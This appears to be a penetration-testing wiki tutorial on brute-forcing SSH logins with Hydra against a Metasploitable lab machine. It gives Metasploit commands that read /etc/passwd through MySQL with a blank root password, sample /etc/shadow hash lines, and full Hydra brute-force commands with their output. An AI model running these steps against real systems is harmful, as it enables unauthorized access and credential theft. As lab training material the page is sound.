From charlesreid1

Background

We will use Hydra to brute-force SSH logins.

Usage

If we just type hydra, we can see the basic usage:

root@morpheus:~# hydra 
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1

Procedure

Cracking with Hydra proceeds as follows:

  • Get a host or list of hosts to attack
  • Get a username or list of usernames from the host to try and crack
  • Get a wordlist or list of passwords to try
  • Run Hydra

The ideal scenario is that we can brute force an SSH login for the root user. However, this is typically disabled in SSH servers, so not the way to go.

To be successful, we will need to obtain or guess a username or list of users on the system. This can be done in a couple of different ways.

Two methods that utilize SQL servers are covered in Metasploitable/MySQL and Metasploitable/Postgres. Both pages cover techniques for obtaining /etc/passwd contents with metasploit.

Another method that will tell you which users can log in remotely and which cannot is to obtain the /etc/shadow file. However, if you have /etc/shadow, you can just crack the passwords offline with John the Ripper, so...... don't use Hydra if you have /etc/shadow.

Once you have a list of users, you'll need some wordlists to construct passwords to try.

Step by Step

Obtaining Usernames

If you do happen to have access to /etc/passwd and the list of users on the system, this is idea. Here's a recap of how to get the contents of that file from the MySQL server. Here, we're using a username of root and a password of (blank) to crack the MySQL server at 10.0.0.27:

root@morpheus:~# msfconsole
msf > use auxiliary/admin/mysql/mysql_sql
msf auxiliary(mysql_sql) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_sql) > set PASSWORD ''
PASSWORD =>
msf auxiliary(mysql_sql) > set RHOST 10.0.0.27
RHOST => 10.0.0.27
msf auxiliary(mysql_sql) > set SQL select load_file(\'/etc/passwd\')
SQL => select load_file('/etc/passwd')
msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select load_file('/etc/passwd')'...
[*]  | root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
 |
[*] Auxiliary module execution completed

Bingo, now you have a list of users. Some of these may not be set up to log in remotely, but you'd be surprised. Most of the users also have a bash shell set!

Reading /etc/shadow

If you have access to /etc/shadow, you have access to the encrypted passwords. Don't use Hydra - use /etc/shadow.

For some more info on how to read the /etc/shadow file:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

There are 8 fields here:

  • Username : It is your login name.
  • Password : It is your encrypted password. The password should be minimum 6-8 characters long including special characters/digits and more.
  • Last password change (lastchanged) : Days since Jan 1, 1970 that password was last changed
  • Minimum : The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password
  • Maximum : The maximum number of days the password is valid (after that user is forced to change his/her password)
  • Warn : The number of days before password is to expire that user is warned that his/her password must be changed
  • Inactive : The number of days after password expires that account is disabled
  • Expire : days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.

The most important two fields, then are the first two:

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

The root and sys users can both log in, and we have the hash of their passwords.

However, the * (or a ! character) in place of a password hash means that account cannot be used for remote logins.

This reduces the list of usable usernames to:

root@morpheus:~# cat users_file
root
sys
klog
msfadmin
postgres
user
service

Reality Check

Quick reality check: brute-forcing SSH logins is very slow (limited by how many SSH connections a victim's SSH server will accept), so if you have access to /etc/shadow, you might as well crack those passwords offline with John the Ripper.

Start

Command Line Options

Running Hydra requires specifying a few flags, and the flags depend on whether you are trying a single username/password or multiple usernames/passwords.

Single username/single password:

  • -l to specify a single login username
  • -p to specify a single password

Multiple usernames/multiple passwords:

  • -L to specify a file with a list of usernames
  • -P to specify a file with a list of passwords to try

You can also specify a number of tasks to run in parallel:

  • -t TASKS to specify how many tasks to run in parallel (default is 16)

You must also specify the target machine address, and the protocol (ssh or something else), all on the command line.

$ hydra -l root -P /root/password.txt 192.168.0.128 ssh

Command Line Command

Here's an example of a final command:

# hydra -L users_file -P 500-worst-passwords.txt ssh://10.0.0.27:22

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-25 21:45:13
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 4 tasks per 1 server, overall 64 tasks, 3549 login tries (l:7/p:507), ~13 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 3505 todo in 01:20h, 4 active

This is extremely slow when compared to an offline password-cracking method like John the Ripper - online cracking should only be used as a last resort. If it is possible to obtain the password hashes from /etc/shadow or elsewhere, and crack offline, do that instead.

Brute-forcing SSH logins requires a lot of time, a lot of patience, and a series of very good guesses. In general, it is not a terribly practical way to do it, unless you've got extra/insider information.

But Wait, There's More!

Hydra is not just for cracking SSH servers. The following is a list of other protocols that can be cracked using Hydra:

  • afp
  • cisco
  • cisco-enable
  • cvs
  • firebird
  • ftp
  • http-get
  • http-head
  • http-proxy
  • https-get
  • https-head
  • https-form-get
  • https-form-post
  • icq
  • imap
  • imap-ntlm
  • ldap2
  • ldap3
  • mssql
  • mysql
  • ncp
  • nntp
  • oracle-listener
  • pcanywhere
  • pcnfs
  • pop3
  • pop3-ntlm
  • postgres
  • rexec
  • rlogin
  • rsh
  • sapr3
  • sip
  • smb
  • smbnt
  • smtp-auth
  • smtp-auth-ntlm
  • snmp
  • socks5
  • ssh2
  • teamspeak
  • telnet
  • vmauthd
  • vnc

Links

Dr. Chaos guide to using Hydra: http://www.drchaos.com/breaking-ssh-vnc-and-other-passwords-with-kali-linux-and-hydra/

Flags